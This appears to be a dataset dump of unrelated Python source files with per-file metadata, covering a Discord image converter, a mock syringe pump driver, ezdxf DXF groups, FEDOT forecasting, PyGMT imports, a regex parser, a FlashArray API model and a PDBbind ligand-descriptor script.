r"(https?://[^\"\'\s]*\.(?:png|jpg|jpeg|gif|svg)(\?size=[0-9]*)?)", flags=re.I
)
EMOJI_REGEX = re.compile(r"(<(a)?:[a-zA-Z0-9_]+:([0-9]+)>)")
MENTION_REGEX = re.compile(r"<@!?([0-9]+)>")
ID_REGEX = re.compile(r"[0-9]{17,}")
class ImageFinder(Converter):
"""
This is a class to convert notsobots image searching capabilities
into a more general converter class
"""
async def convert(self, ctx, argument):
attachments = ctx.message.attachments
mentions = MENTION_REGEX.finditer(argument)
matches = IMAGE_LINKS.finditer(argument)
emojis = EMOJI_REGEX.finditer(argument)
ids = ID_REGEX.finditer(argument)
urls = []
if matches:
for match in matches:
# print(match.group(1))
urls.append(match.group(1))
if emojis:
for emoji in emojis:
ext = "gif" if emoji.group(2) else "png"
url = "https://cdn.discordapp.com/emojis/{id}.{ext}?v=1".format(
id=emoji.group(3), ext=ext
)
urls.append(url)
if mentions:
for mention in mentions:
user = ctx.guild.get_member(int(mention.group(1)))
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if not urls and ids:
for possible_id in ids:
user = ctx.guild.get_member(int(possible_id.group(0)))
if user:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if attachments:
for attachment in attachments:
urls.append(attachment.url)
if not urls:
ctx.command.reset_cooldown(ctx)
raise BadArgument(_("No images provided."))
return urls
async def search_for_images(self, ctx):
urls = []
async for message in ctx.channel.history(limit=10):
if message.attachments:
for attachment in message.attachments:
urls.append(attachment.url)
match = IMAGE_LINKS.match(message.content)
if match:
urls.append(match.group(1))
if not urls:
ctx.command.reset_cooldown(ctx)
raise ValueError(_("No Images found in recent history."))
return urls
| reverseimagesearch/converters.py | 3,075 | This is a class to convert notsobots image searching capabilities
into a more general converter class
https://github.com/TrustyJAID/Trusty-cogs/blob/master/notsobot/converter.py print(match.group(1)) | 201 | en | 0.641046 |
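A hypothetical sketch of how a Red-DiscordBot cog command would consume this converter; the command and cog names are assumptions, not part of the original file:

from redbot.core import commands


class ReverseImageSearch(commands.Cog):
    @commands.command()
    async def revsearch(self, ctx, *, images: ImageFinder = None):
        # discord.py calls ImageFinder.convert() on the supplied argument; if
        # nothing was passed, fall back to scanning recent channel history.
        if images is None:
            images = await ImageFinder().search_for_images(ctx)
        await ctx.send(f"Found {len(images)} image URL(s), first: {images[0]}")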
import titration.utils.analysis as analysis
import titration.utils.constants as constants
import titration.utils.devices.serial_mock as serial_mock
import titration.utils.interfaces as interfaces
class Syringe_Pump:
def __init__(self):
self.serial = serial_mock.Serial(
port=constants.ARDUINO_PORT,
baudrate=constants.ARDUINO_BAUD,
timeout=constants.ARDUINO_TIMEOUT,
)
self.volume_in_pump = constants.volume_in_pump
self.max_pump_capacity = constants.MAX_PUMP_CAPACITY
def set_volume_in_pump(self, volume):
self.volume_in_pump = volume
constants.volume_in_pump = volume
def get_volume_in_pump(self):
return self.volume_in_pump
def pump_volume(self, volume, direction):
volume_to_add = volume
# pull in solution
if direction == 0:
# check if volume to add is greater than space left
space_in_pump = self.max_pump_capacity - self.volume_in_pump
if volume_to_add > space_in_pump:
volume_to_add = self.max_pump_capacity - self.volume_in_pump
self.drive_pump(volume_to_add, direction)
# pump out solution
elif direction == 1:
# volume greater than max capacity of pump
if volume_to_add > self.max_pump_capacity:
interfaces.lcd_out(
"Volume > pumpable", style=constants.LCD_CENT_JUST, line=4
)
# pump out all current volume
next_volume = self.volume_in_pump
self.drive_pump(next_volume, 1)
# calculate new volume to add
volume_to_add = volume_to_add - next_volume
# keep pumping until full volume_to_add is met
while volume_to_add > 0:
next_volume = min(volume_to_add, self.max_pump_capacity)
self.drive_pump(next_volume, 0)
self.drive_pump(next_volume, 1)
volume_to_add -= next_volume
# volume greater than volume in pump
elif volume_to_add > self.volume_in_pump:
next_volume = self.volume_in_pump
self.drive_pump(next_volume, 1)
# calculate remaining volume to add
volume_to_add -= next_volume
self.drive_pump(volume_to_add, 0)
self.drive_pump(volume_to_add, 1)
else:
# volume less than volume in pump
self.drive_pump(volume_to_add, direction)
def drive_pump(self, volume, direction):
"""Converts volume to cycles and ensures and checks pump level and values"""
if direction == 0:
space_in_pump = self.max_pump_capacity - self.volume_in_pump
if volume > space_in_pump:
interfaces.lcd_out("Filling Error", line=4)
else:
interfaces.lcd_out("Filling {0:1.2f} ml".format(volume), line=4)
cycles = analysis.determine_pump_cycles(volume)
self.drive_step_stick(cycles, direction)
self.volume_in_pump += volume
elif direction == 1:
if volume > self.volume_in_pump:
interfaces.lcd_out("Pumping Error", line=4)
else:
interfaces.lcd_out("Pumping {0:1.2f} ml".format(volume), line=4)
cycles = analysis.determine_pump_cycles(volume)
offset = self.drive_step_stick(cycles, direction)
# offset is what is returned from drive_step_stick which originally is returned from the arduino
if offset != 0:
self.drive_step_stick(offset, 0)
self.drive_step_stick(offset, 1)
self.volume_in_pump -= volume
interfaces.lcd_out("Pump Vol: {0:1.2f} ml".format(self.volume_in_pump), line=4)
def drive_step_stick(self, cycles, direction):
"""
cycles and direction are integers
Communicates with arduino to add HCl through pump
:param cycles: number of rising edges for the pump
:param direction: direction of pump
"""
if cycles == 0:
return 0
if self.serial.writable():
self.serial.write(cycles.to_bytes(4, "little"))
self.serial.write(direction.to_bytes(1, "little"))
self.serial.flush()
temp = self.serial.readline()
if temp == b"DONE\r\n" or temp == b"":
return 0
else:
return int(temp)
else:
interfaces.lcd_out("Arduino Unavailable", 4, constants.LCD_CENT_JUST)
| titration/utils/devices/syringe_pump_mock.py | 4,723 | Converts volume to cycles and ensures and checks pump level and values
cycles and direction are integers
Communicates with arduino to add HCl through pump
:param cycles: number of rising edges for the pump
:param direction: direction of pump
pull in solution check if volume to add is greater than space left pump out solution volume greater than max capacity of pump pump out all current volume calculate new volume to add keep pumping until full volume_to_add is met volume greater than volume in pump calculate remaining volume to add volume less than volume in pump offset is what is returned from drive_step_stick which originally is returned from the arduino | 666 | en | 0.900069 |
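A minimal usage sketch of the mock pump; no hardware is needed because serial_mock stands in for the Arduino, though the package's interfaces and constants modules are assumed to be set up as in the titration app:

pump = Syringe_Pump()
pump.set_volume_in_pump(0)
pump.pump_volume(1.0, 0)   # direction 0: draw 1.0 ml into the syringe
pump.pump_volume(0.5, 1)   # direction 1: dispense 0.5 ml
print(pump.get_volume_in_pump())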
# Copyright (c) 2019-2020, Manfred Moitzi
# License: MIT-License
from typing import TYPE_CHECKING, Iterable, cast, Union, List, Set
from contextlib import contextmanager
import logging
from ezdxf.lldxf import validator, const
from ezdxf.lldxf.attributes import (
DXFAttr, DXFAttributes, DefSubclass, RETURN_DEFAULT, group_code_mapping,
)
from ezdxf.audit import AuditError
from .dxfentity import base_class, SubclassProcessor, DXFEntity
from .dxfobj import DXFObject
from .factory import register_entity
from .objectcollection import ObjectCollection
logger = logging.getLogger('ezdxf')
if TYPE_CHECKING:
from ezdxf.eztypes import (
TagWriter, Drawing, DXFNamespace, Auditor, EntityDB,
)
__all__ = ['DXFGroup', 'GroupCollection']
acdb_group = DefSubclass('AcDbGroup', {
# Group description
'description': DXFAttr(300, default=''),
# 1 = Unnamed
# 0 = Named
'unnamed': DXFAttr(
70, default=1, validator=validator.is_integer_bool,
fixer=RETURN_DEFAULT,
),
# 1 = Selectable
# 0 = Not selectable
'selectable': DXFAttr(
71, default=1,
validator=validator.is_integer_bool,
fixer=RETURN_DEFAULT,
),
# 340: Hard-pointer handle to entity in group (one entry per object)
})
acdb_group_group_codes = group_code_mapping(acdb_group)
GROUP_ITEM_CODE = 340
@register_entity
class DXFGroup(DXFObject):
""" Groups are not allowed in block definitions, and each entity can only
reside in one group, so cloning of groups creates also new entities.
"""
DXFTYPE = 'GROUP'
DXFATTRIBS = DXFAttributes(base_class, acdb_group)
def __init__(self):
super().__init__()
self._handles: Set[str] = set() # only needed at the loading stage
self._data: List[DXFEntity] = []
def copy(self):
raise const.DXFTypeError('Copying of GROUP not supported.')
def load_dxf_attribs(self,
processor: SubclassProcessor = None) -> 'DXFNamespace':
dxf = super().load_dxf_attribs(processor)
if processor:
tags = processor.fast_load_dxfattribs(
dxf, acdb_group_group_codes, 1, log=False)
self.load_group(tags)
return dxf
def load_group(self, tags):
for code, value in tags:
if code == GROUP_ITEM_CODE:
# First store handles, because at this point, objects
# are not stored in the EntityDB:
self._handles.add(value)
def preprocess_export(self, tagwriter: 'TagWriter') -> bool:
self.purge(self.doc.entitydb)
return True # export even empty groups
def export_entity(self, tagwriter: 'TagWriter') -> None:
""" Export entity specific data as DXF tags. """
super().export_entity(tagwriter)
tagwriter.write_tag2(const.SUBCLASS_MARKER, acdb_group.name)
self.dxf.export_dxf_attribs(tagwriter, [
'description', 'unnamed', 'selectable'])
self.export_group(tagwriter)
def export_group(self, tagwriter: 'TagWriter'):
for entity in self._data:
tagwriter.write_tag2(GROUP_ITEM_CODE, entity.dxf.handle)
def __iter__(self) -> Iterable[DXFEntity]:
""" Iterate over all DXF entities in :class:`DXFGroup` as instances of
:class:`DXFGraphic` or inherited (LINE, CIRCLE, ...).
"""
return (e for e in self._data if e.is_alive)
def __len__(self) -> int:
""" Returns the count of DXF entities in :class:`DXFGroup`. """
return len(self._data)
def __getitem__(self, item):
""" Returns entities by standard Python indexing and slicing. """
return self._data[item]
def __contains__(self, item: Union[str, DXFEntity]) -> bool:
""" Returns ``True`` if item is in :class:`DXFGroup`. `item` has to be
a handle string or an object of type :class:`DXFEntity` or inherited.
"""
handle = item if isinstance(item, str) else item.dxf.handle
return handle in set(self.handles())
def handles(self) -> Iterable[str]:
""" Iterable of handles of all DXF entities in :class:`DXFGroup`. """
return (entity.dxf.handle for entity in self)
def post_load_hook(self, doc: 'Drawing') -> None:
super().post_load_hook(doc)
db_get = doc.entitydb.get
def entities():
for handle in self._handles:
entity = db_get(handle)
if entity and entity.is_alive:
yield entity
try:
self.set_data(entities())
except const.DXFStructureError as e:
logger.error(str(e))
del self._handles # all referenced entities are stored in _data
@contextmanager
def edit_data(self) -> List[DXFEntity]:
""" Context manager which yields all the group entities as
standard Python list::
with group.edit_data() as data:
# add new entities to a group
data.append(modelspace.add_line((0, 0), (3, 0)))
# remove last entity from a group
data.pop()
"""
data = list(self)
yield data
self.set_data(data)
def set_data(self, entities: Iterable[DXFEntity]) -> None:
""" Set `entities` as new group content, entities should be an iterable
:class:`DXFGraphic` or inherited (LINE, CIRCLE, ...).
Raises :class:`DXFValueError` if not all entities be on the same layout
(modelspace or any paperspace layout but not block)
"""
entities = list(entities)
if not all_entities_on_same_layout(entities):
raise const.DXFStructureError(
"All entities have to be in the same layout and are not allowed"
" to be in a block layout."
)
self.clear()
self._data = entities
def extend(self, entities: Iterable[DXFEntity]) -> None:
""" Add `entities` to :class:`DXFGroup`. """
self._data.extend(entities)
def clear(self) -> None:
""" Remove all entities from :class:`DXFGroup`, does not delete any
drawing entities referenced by this group.
"""
self._data = []
def audit(self, auditor: 'Auditor') -> None:
""" Remove invalid handles from :class:`DXFGroup`.
Invalid handles are: deleted entities, not all entities in the same
layout or entities in a block layout.
"""
# Remove destroyed or invalid entities:
self.purge(auditor.entitydb)
if not all_entities_on_same_layout(self._data):
auditor.fixed_error(
code=AuditError.GROUP_ENTITIES_IN_DIFFERENT_LAYOUTS,
message=f'Cleared {str(self)}, not all entities are located in '
f'the same layout.',
)
self.clear()
def _has_valid_owner(self, entity, db: 'EntityDB') -> bool:
# no owner -> no layout association
if entity.dxf.owner is None:
return False
owner = db.get(entity.dxf.owner)
# owner does not exist or is destroyed -> no layout association
if owner is None or not owner.is_alive:
return False
# owner block_record.layout is 0 if entity is in a block definition,
# which is not allowed:
valid = owner.dxf.layout != '0'
if not valid:
logger.debug(
f"{str(entity)} in {str(self)} is located in a block layout, "
f"which is not allowed")
return valid
def _filter_invalid_entities(self, db: 'EntityDB') -> List[DXFEntity]:
assert db is not None
return [e for e in self._data
if e.is_alive and self._has_valid_owner(e, db)]
def purge(self, db: 'EntityDB') -> None:
""" Remove invalid group entities. """
self._data = self._filter_invalid_entities(db)
def all_entities_on_same_layout(entities: Iterable[DXFEntity]):
""" Check if all entities are on the same layout (model space or any paper
layout but not block).
"""
owners = set(entity.dxf.owner for entity in entities)
# 0 for no entities; 1 for all entities on the same layout
return len(owners) < 2
class GroupCollection(ObjectCollection):
def __init__(self, doc: 'Drawing'):
super().__init__(doc, dict_name='ACAD_GROUP', object_type='GROUP')
self._next_unnamed_number = 0
def groups(self) -> Iterable[DXFGroup]:
""" Iterable of all existing groups. """
for name, group in self:
yield group
def next_name(self) -> str:
name = self._next_name()
while name in self:
name = self._next_name()
return name
def _next_name(self) -> str:
self._next_unnamed_number += 1
return f"*A{self._next_unnamed_number}"
def new(self, name: str = None, description: str = "",
selectable: bool = True) -> DXFGroup:
r""" Creates a new group. If `name` is ``None`` an unnamed group is
created, which has an automatically generated name like "\*Annnn".
Args:
name: group name as string
description: group description as string
selectable: group is selectable if ``True``
"""
if name in self:
raise const.DXFValueError(f"GROUP '{name}' already exists.")
if name is None:
name = self.next_name()
unnamed = 1
else:
unnamed = 0
# The group name isn't stored in the group entity itself.
dxfattribs = {
'description': description,
'unnamed': unnamed,
'selectable': int(bool(selectable)),
}
return cast(DXFGroup, self._new(name, dxfattribs))
def delete(self, group: Union[DXFGroup, str]) -> None:
""" Delete `group`, `group` can be an object of type :class:`DXFGroup`
or a group name as string.
"""
# Delete group by name:
if isinstance(group, str):
name = group
elif group.dxftype() == 'GROUP':
name = get_group_name(group, self.entitydb)
else:
raise TypeError(group.dxftype())
if name in self:
super().delete(name)
else:
raise const.DXFValueError("GROUP not in group table registered.")
def audit(self, auditor: 'Auditor') -> None:
""" Removes empty groups and invalid handles from all groups. """
trash = []
for name, group in self:
group.audit(auditor)
if not len(group): # remove empty group
# do not delete groups while iterating over groups!
trash.append(name)
# now delete empty groups
for name in trash:
auditor.fixed_error(
code=AuditError.REMOVE_EMPTY_GROUP,
message=f'Removed empty group "{name}".',
)
self.delete(name)
def get_group_name(group: DXFGroup, db: 'EntityDB') -> str:
""" Get name of `group`. """
group_table = cast('Dictionary', db[group.dxf.owner])
for name, entity in group_table.items():
if entity is group:
return name
| src/ezdxf/entities/dxfgroups.py | 11,294 | Groups are not allowed in block definitions, and each entity can only
reside in one group, so cloning of groups creates also new entities.
Returns ``True`` if item is in :class:`DXFGroup`. `item` has to be
a handle string or an object of type :class:`DXFEntity` or inherited.
Returns entities by standard Python indexing and slicing.
Iterate over all DXF entities in :class:`DXFGroup` as instances of
:class:`DXFGraphic` or inherited (LINE, CIRCLE, ...).
Returns the count of DXF entities in :class:`DXFGroup`.
Check if all entities are on the same layout (model space or any paper
layout but not block).
Remove invalid handles from :class:`DXFGroup`.
Invalid handles are: deleted entities, not all entities in the same
layout or entities in a block layout.
Removes empty groups and invalid handles from all groups.
Remove all entities from :class:`DXFGroup`, does not delete any
drawing entities referenced by this group.
Delete `group`, `group` can be an object of type :class:`DXFGroup`
or a group name as string.
Context manager which yields all the group entities as
standard Python list::
with group.edit_data() as data:
# add new entities to a group
data.append(modelspace.add_line((0, 0), (3, 0)))
# remove last entity from a group
data.pop()
Export entity specific data as DXF tags.
Add `entities` to :class:`DXFGroup`.
Get name of `group`.
Iterable of all existing groups.
Iterable of handles of all DXF entities in :class:`DXFGroup`.
Creates a new group. If `name` is ``None`` an unnamed group is
created, which has an automatically generated name like "\*Annnn".
Args:
name: group name as string
description: group description as string
selectable: group is selectable if ``True``
Remove invalid group entities.
Set `entities` as new group content, entities should be an iterable
:class:`DXFGraphic` or inherited (LINE, CIRCLE, ...).
Raises :class:`DXFValueError` if not all entities be on the same layout
(modelspace or any paperspace layout but not block)
Copyright (c) 2019-2020, Manfred Moitzi License: MIT-License Group description 1 = Unnamed 0 = Named 1 = Selectable 0 = Not selectable 340: Hard-pointer handle to entity in group (one entry per object) only needed at the loading stage First store handles, because at this point, objects are not stored in the EntityDB: export even empty groups all referenced entities are stored in _data Remove destroyed or invalid entities: no owner -> no layout association owner does not exist or is destroyed -> no layout association owner block_record.layout is 0 if entity is in a block definition, which is not allowed: 0 for no entities; 1 for all entities on the same layout The group name isn't stored in the group entity itself. Delete group by name: remove empty group do not delete groups while iterating over groups! now delete empty groups | 2,866 | en | 0.823031 |
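Typical usage goes through ezdxf's public API, where the GroupCollection above is exposed as doc.groups:

import ezdxf

doc = ezdxf.new()
msp = doc.modelspace()
group = doc.groups.new(name='MyGroup', description='example group')
with group.edit_data() as entities:
    entities.append(msp.add_line((0, 0), (3, 0)))
    entities.append(msp.add_circle((0, 0), radius=1))
print(len(group))  # 2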
import numpy as np
import pandas as pd
from pylab import rcParams
from sklearn.metrics import mean_absolute_error, mean_squared_error
# Additional custom functions
from cases.industrial.processing import multi_automl_fit_forecast, plot_results
from fedot.core.constants import BEST_QUALITY_PRESET_NAME
from fedot.core.data.multi_modal import prepare_multimodal_data
rcParams['figure.figsize'] = 15, 7
if __name__ == '__main__':
# Below is an example of multivariate time series forecasting.
# An example of how forecasts can be made is presented and a simple
# validation is given on a single block which length is equal to the
# length of the forecast horizon.
# Define forecast horizon and read dataframe
forecast_length = 20
df = pd.read_csv('pw_dataset.csv', parse_dates=['datetime'])
# Wrap time series data into InputData class
features_to_use = ['wind_power_kWh', 'diesel_time_h', 'wind_time_h',
'velocity_max_msec', 'velocity_mean_msec', 'tmp_grad',
'diesel_fuel_kWh']
ts = np.array(df['diesel_fuel_kWh'])
mm_train, mm_test, = prepare_multimodal_data(dataframe=df,
features=features_to_use,
forecast_length=forecast_length)
# Prepare parameters for algorithm launch
    # timeout is given in minutes, e.g. timeout=0.5 lets the AutoML algorithm run for 30 seconds
    timeout = 0.5
composer_params = {'max_depth': 6,
'max_arity': 3,
'pop_size': 20,
'num_of_generations': 20,
'preset': BEST_QUALITY_PRESET_NAME,
'metric': 'rmse',
'cv_folds': None,
'validation_blocks': None}
forecast, obtained_pipeline = multi_automl_fit_forecast(mm_train, mm_test,
timeout, composer_params,
ts, forecast_length,
vis=True)
mse_metric = mean_squared_error(ts[-forecast_length:], forecast, squared=False)
mae_metric = mean_absolute_error(ts[-forecast_length:], forecast)
print(f'MAE - {mae_metric:.2f}')
print(f'RMSE - {mse_metric:.2f}')
# Save obtained pipeline
obtained_pipeline.save('best')
# Visualise predictions
plot_results(actual_time_series=ts,
predicted_values=forecast,
len_train_data=len(ts) - forecast_length)
| cases/industrial/multivariate_forecasting.py | 2,600 | Additional custom functions Below is an example of multivariate time series forecasting. An example of how forecasts can be made is presented and a simple validation is given on a single block which length is equal to the length of the forecast horizon. Define forecast horizon and read dataframe Wrap time series data into InputData class Prepare parameters for algorithm launch timeout 5 - means that AutoML algorithm will work for 5 minutes Save obtained pipeline Visualise predictions | 488 | en | 0.8607 |
"""
Source code for PyGMT modules.
"""
# pylint: disable=import-outside-toplevel
from pygmt.src.basemap import basemap
from pygmt.src.blockm import blockmean, blockmedian
from pygmt.src.coast import coast
from pygmt.src.colorbar import colorbar
from pygmt.src.config import config
from pygmt.src.contour import contour
from pygmt.src.grd2cpt import grd2cpt
from pygmt.src.grdcontour import grdcontour
from pygmt.src.grdcut import grdcut
from pygmt.src.grdfilter import grdfilter
from pygmt.src.grdimage import grdimage
from pygmt.src.grdinfo import grdinfo
from pygmt.src.grdtrack import grdtrack
from pygmt.src.grdview import grdview
from pygmt.src.image import image
from pygmt.src.info import info
from pygmt.src.inset import inset
from pygmt.src.legend import legend
from pygmt.src.logo import logo
from pygmt.src.makecpt import makecpt
from pygmt.src.meca import meca
from pygmt.src.plot import plot
from pygmt.src.plot3d import plot3d
from pygmt.src.rose import rose
from pygmt.src.solar import solar
from pygmt.src.subplot import set_panel, subplot
from pygmt.src.surface import surface
from pygmt.src.text import text_ as text # "text" is an argument within "text_"
from pygmt.src.which import which
from pygmt.src.x2sys_cross import x2sys_cross
from pygmt.src.x2sys_init import x2sys_init
| pygmt/src/__init__.py | 1,300 | Source code for PyGMT modules.
pylint: disable=import-outside-toplevel "text" is an argument within "text_" | 109 | en | 0.583758 |
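These wrappers surface in the public pygmt API either as Figure methods (for the plotting modules) or as module-level functions such as pygmt.makecpt; a small hedged example:

import pygmt

fig = pygmt.Figure()
fig.coast(region="g", projection="W15c", land="lightgray", water="white", frame=True)
fig.savefig("example_map.png")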
# -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import, unicode_literals
from parser_base import RegexParser
import model
class RegexSemantics(object):
def __init__(self):
super(RegexSemantics, self).__init__()
self._count = 0
def START(self, ast):
return model.Regex(ast)
def CHOICE(self, ast):
return model.Choice(ast.opts)
def SEQUENCE(self, ast):
if not ast.terms:
return model.Empty()
elif len(ast.terms) < 2:
return ast.terms[0]
else:
return model.Sequence(ast.terms)
def CLOSURE(self, ast):
return model.Closure(ast)
def SUBEXP(self, ast):
return ast
def LITERAL(self, ast):
return model.Literal(ast)
def translate(regex, trace=False):
parser = RegexParser(trace=trace, semantics=RegexSemantics())
model = parser.parse(regex, 'START')
model.set_rule_numbers()
return model.render()
| examples/regex/regex_parser.py | 993 | -*- coding: utf-8 -*- | 21 | en | 0.767281 |
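A hypothetical invocation of translate(); the parser_base and model modules it depends on are not shown in this row, so the rendered output depends on their implementation:

if __name__ == '__main__':
    import sys
    pattern = sys.argv[1] if len(sys.argv) > 1 else '(a|b)*abb'
    print(translate(pattern, trace=False))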
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_7 import models
class VolumeSnapshotGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'more_items_remaining': 'bool',
'total_item_count': 'int',
'continuation_token': 'str',
'items': 'list[VolumeSnapshot]',
'total': 'list[VolumeSnapshot]'
}
attribute_map = {
'more_items_remaining': 'more_items_remaining',
'total_item_count': 'total_item_count',
'continuation_token': 'continuation_token',
'items': 'items',
'total': 'total'
}
required_args = {
}
def __init__(
self,
more_items_remaining=None, # type: bool
total_item_count=None, # type: int
continuation_token=None, # type: str
items=None, # type: List[models.VolumeSnapshot]
total=None, # type: List[models.VolumeSnapshot]
):
"""
Keyword args:
more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
items (list[VolumeSnapshot]): Returns a list of all items after filtering. The values are displayed for each name where meaningful. If `total_only=true`, the `items` list will be empty.
total (list[VolumeSnapshot]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
"""
if more_items_remaining is not None:
self.more_items_remaining = more_items_remaining
if total_item_count is not None:
self.total_item_count = total_item_count
if continuation_token is not None:
self.continuation_token = continuation_token
if items is not None:
self.items = items
if total is not None:
self.total = total
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `VolumeSnapshotGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(VolumeSnapshotGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, VolumeSnapshotGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| pypureclient/flasharray/FA_2_7/models/volume_snapshot_get_response.py | 5,392 | Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
Returns true if both objects are equal
Keyword args:
more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
items (list[VolumeSnapshot]): Returns a list of all items after filtering. The values are displayed for each name where meaningful. If `total_only=true`, the `items` list will be empty.
total (list[VolumeSnapshot]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
Returns true if both objects are not equal
For `print` and `pprint`
Returns the model properties as a dict
Returns the string representation of the model
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
coding: utf-8 type: bool type: int type: str type: List[models.VolumeSnapshot] type: List[models.VolumeSnapshot] | 2,102 | en | 0.698974 |
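Because the generated class is a plain container, it can be constructed directly and serialized with to_dict(); a small sketch using only the fields defined above:

resp = VolumeSnapshotGetResponse(total_item_count=2, items=[])
print(resp.to_dict())   # {'total_item_count': 2, 'items': []}
print(resp)             # pretty-printed via __repr__/to_str()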
"""A fingerprint + random forest model.
Try to generate independent and identically distributed figerprint as decoy.
"""
import os
import sys
import json
import argparse
import numpy as np
from pathlib import Path
from tqdm import tqdm
import scipy.sparse as sp
from scipy.spatial import distance
from multiprocessing import Pool
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit import DataStructs
from rdkit.Chem import Descriptors
from sklearn import metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import RandomForestRegressor
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-i', '--index', required=True)
parser.add_argument(
'-d', '--datadir', required=True, help="pdbbind datadir, like v2018")
parser.add_argument(
'-u', '--uclust', help="uclust output, format: https://www.drive5.com/usearch/manual/opt_uc.html")
args = parser.parse_args()
DATADIR = Path(args.datadir)
def read_index(index_file):
codes = []
pKs = []
with open(index_file) as f:
for i in f:
if i[0] == '#': continue
code, reso, year, pK, *others = i.split()
codes.append(code)
pKs.append(float(pK))
return codes, pKs
def getProp(mol):
mw = Descriptors.ExactMolWt(mol)
logp = Descriptors.MolLogP(mol)
rotb = Descriptors.NumRotatableBonds(mol)
hbd = Descriptors.NumHDonors(mol)
hba = Descriptors.NumHAcceptors(mol)
q = Chem.GetFormalCharge(mol)
return tuple([mw, logp, rotb, hbd, hba, q])
def load_fps(codes):
print("Loading ligand fingerprint")
fps = []
for i, code in tqdm(enumerate(codes), total=len(codes)):
# already converted ligand.mol2 to ligand.pdb by babel
path = DATADIR / code / (code + '_ligand.pdb')
if not path.exists():
fps.append(None)
continue
mol = Chem.MolFromPDBFile(str(path))
if mol is None:
fps.append(None)
continue
# fp = AllChem.GetMorganFingerprintAsBitVect(mol, 2, nBits=512)
fp = getProp(mol)
fps.append(fp)
notNone = sum([1 for i in fps if i is not None])
print('succeed loaded {}/{}'.format(notNone, len(codes)))
return fps
def load_clust(uclust_file, codes):
clust_nums = [None for i in codes]
all_clust_nums = []
labels = []
with open(uclust_file) as f:
for line in f:
fields = line.split()
all_clust_nums.append( int(fields[1]))
labels.append(fields[8])
for i, code in enumerate(codes):
try:
idx = labels.index(code)
clust_nums[i] = all_clust_nums[idx]
except ValueError:
continue
return clust_nums
codes, pKs = read_index(args.index)
fps = load_fps(codes)
Nones = [i for i in range(len(codes)) if fps[i] is None]
fps = [j for i,j in enumerate(fps) if i not in Nones]
pKs = [j for i,j in enumerate(pKs) if i not in Nones]
codes = [j for i,j in enumerate(codes) if i not in Nones]
X = np.array(fps)
if args.uclust:
clust_nums = load_clust(args.uclust, codes)
Nones.extend([i for i in range(len(codes)) if clust_nums[i] is None])
Nones = set(Nones)
fps = [j for i,j in enumerate(fps) if i not in Nones]
pKs = [j for i,j in enumerate(pKs) if i not in Nones]
codes = [j for i,j in enumerate(codes) if i not in Nones]
clust_nums = [j for i,j in enumerate(clust_nums) if i not in Nones]
clust_nums = np.array(clust_nums, dtype=int)
join_clust = np.zeros_like(clust_nums)
for i, num in enumerate(set(clust_nums)):
mask = clust_nums == num
        # clusters with fewer than 10 members are left as cluster 0
if sum(mask) >= 10:
join_clust[mask] = i+1
nb_clust = max(join_clust) + 1
print(join_clust)
one_hot = np.eye(nb_clust, dtype=int)[join_clust]
